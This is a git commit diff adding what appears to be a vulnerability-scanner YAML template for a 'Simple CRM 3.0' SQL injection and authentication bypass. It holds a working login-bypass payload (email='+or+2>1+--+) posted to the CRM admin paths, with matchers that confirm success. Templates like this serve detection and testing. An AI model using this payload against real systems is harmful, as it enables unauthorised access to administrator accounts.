Create simple-crm-sql-injection.yaml
parent
03fd413bb1
commit
9fb1b464b4
|
@ -0,0 +1,33 @@
|
|||
id: simple-crm-sql-injection
|
||||
|
||||
info:
|
||||
name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass
|
||||
reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
|
||||
author: geeknik
|
||||
severity: critical
|
||||
tags: sqli,bypass,simplecrm
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/scrm/crm/admin"
|
||||
body: "email='+or+2>1+--+&password=&login="
|
||||
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/crm/admin"
|
||||
body: "email='+or+2>1+--+&password=&login="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>window.location.href='home.php'</script>"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
Loading…
Reference in New Issue